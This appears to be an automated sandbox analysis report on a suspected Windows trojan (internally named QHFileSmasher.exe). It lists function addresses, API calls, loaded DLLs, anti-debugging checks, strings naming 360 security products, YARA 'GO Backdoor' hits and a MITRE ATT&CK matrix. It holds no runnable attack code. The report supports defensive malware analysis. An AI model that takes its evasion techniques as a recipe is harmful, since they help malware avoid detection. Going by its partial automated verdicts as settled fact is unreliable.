Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004162E6	0_2_004162E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048C370	0_2_0048C370
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00410301	0_2_00410301
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004063FC	0_2_004063FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00470440	0_2_00470440
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C465	0_2_0040C465
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416468	0_2_00416468
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C471	0_2_0040C471
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00406413	0_2_00406413
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004784C0	0_2_004784C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C4CD	0_2_0040C4CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00402500	0_2_00402500
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041E5DC	0_2_0041E5DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C58F	0_2_0040C58F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004145A6	0_2_004145A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C5BD	0_2_0040C5BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00412670	0_2_00412670
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041667D	0_2_0041667D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C603	0_2_0040C603
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041E6D4	0_2_0041E6D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C6DA	0_2_0040C6DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004186DD	0_2_004186DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0049E6FC	0_2_0049E6FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416776	0_2_00416776
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C717	0_2_0040C717
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004107D7	0_2_004107D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C7A7	0_2_0041C7A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004147B3	0_2_004147B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00412870	0_2_00412870
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041283C	0_2_0041283C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004188C3	0_2_004188C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004208F8	0_2_004208F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414893	0_2_00414893
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0044A940	0_2_0044A940
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004109E9	0_2_004109E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00418999	0_2_00418999
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00448A60	0_2_00448A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0044AA07	0_2_0044AA07
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0044AA09	0_2_0044AA09
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00408A24	0_2_00408A24
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414A30	0_2_00414A30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004AAAB0	0_2_004AAAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041CB42	0_2_0041CB42
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00412B5A	0_2_00412B5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00408B29	0_2_00408B29
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00408B81	0_2_00408B81
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00408B94	0_2_00408B94
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414C72	0_2_00414C72
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00410CD0	0_2_00410CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041AD54	0_2_0041AD54
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00418D54	0_2_00418D54
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004A2D76	0_2_004A2D76
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040CD2E	0_2_0040CD2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040CDFE	0_2_0040CDFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414EC6	0_2_00414EC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416E88	0_2_00416E88
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416FA1	0_2_00416FA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040B062	0_2_0040B062
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040D06A	0_2_0040D06A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041B00F	0_2_0041B00F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041F03F	0_2_0041F03F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040D0DB	0_2_0040D0DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041712E	0_2_0041712E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004691E0	0_2_004691E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040F18F	0_2_0040F18F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004A32BA	0_2_004A32BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041F3CA	0_2_0041F3CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153D1	0_2_004153D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004613D0	0_2_004613D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153FB	0_2_004153FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153B1	0_2_004153B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153B6	0_2_004153B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153BD	0_2_004153BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004113BC	0_2_004113BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041D440	0_2_0041D440
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00499453	0_2_00499453
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00411417	0_2_00411417
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00473410	0_2_00473410
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040541D	0_2_0040541D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00415424	0_2_00415424
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048F5C2	0_2_0048F5C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004075EC	0_2_004075EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004115FF	0_2_004115FF

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: String function: 0048F134 appears 43 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: String function: 0042033F appears 69 times

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: Resource name: UIDATA type: Zip archive data, at least v1.0 to extract, compression method=store

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C0EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000000.2096153811.000000000052E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1FE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C12A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C138000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C0C9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQHFileSmasher.exeR vs SecuriteInfo.com.FileRepMalware.7838.24766.exe

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal72.troj.evad.winEXE@1/1@0/6

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_00444920 CoCreateInstance,

0_2_00444920

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_00470440 FindResourceW,LoadResource,SizeofResource,FreeResource,_memset,LockResource,FreeResource,

0_2_00470440

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

File created: C:\Users\user\AppData\Local\config

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Section loaded: mswsock.dll	Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static file information: File size 8931328 > 1048576

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7a5000

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0043E2B0 SetErrorMode,ImmDisableIME,GetCommandLineW,CreateMutexW,GetLastError,CloseHandle,StrStrIW,StrStrIW,StrStrIW,FindWindowW,PostMessageW,FindWindowW,PostMessageW,CoInitialize,OleInitialize,LoadLibraryW,GetProcAddress,IsUserAnAdmin,StrStrIW,CloseHandle,DefWindowProcW,InitCommonControlsEx,OleUninitialize,CoUninitialize,CloseHandle,GetModuleHandleW,GetProcAddress,

0_2_0043E2B0

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: real checksum: 0x128f7b should be: 0x888e05

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040E1B2 push es; retn 0000h	0_2_0040E1B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040E4E7 push edi; retf	0_2_0040E4E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048F016 push ecx; ret	0_2_0048F029
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048F179 push ecx; ret	0_2_0048F18C

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_00484124 IsIconic,GetWindowPlacement,GetWindowRect,

0_2_00484124

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

API coverage: 0.3 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0046C990 FindFirstFileW,		0_2_0046C990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW,		0_2_0046D300

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000000.2096153811.000000000052E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `C}P~Up@c^ueq\|ycbqemu
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3339932635.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0048AC3C

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0047A660 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,

0_2_0047A660

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

0_2_0043E2B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0047A0E0 GetProcessHeap,HeapLock,HeapWalk,HeapWalk,HeapWalk,HeapUnlock,

0_2_0047A0E0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048AC3C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_0048AC3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0048B2A4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_0048B2A4

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_004AA320 cpuid

0_2_004AA320

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_004A0059
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	0_2_004945BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	0_2_004A06C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	0_2_004A091F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: GetLocaleInfoA,	0_2_004A49B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	0_2_004A0BE5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	0_2_004A10F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_004A1207
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	0_2_004A129F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_004A1313
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_004A14E5

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0049CB77 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0049CB77

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_0047E640 _memset,GetVersionExW,GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,

0_2_0047E640

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Binary or memory string: \safemon\360tray.exe
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Yara detected GO Backdoor

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.7838.24766.exe PID: 3748, type: MEMORYSTR

Remote Access Functionality

Yara detected GO Backdoor

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.7838.24766.exe PID: 3748, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	33 System Information Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.FileRepMalware.7838.24766.exe	47%	ReversingLabs	Win32.Trojan.Generic

Name	Malicious	Reputation
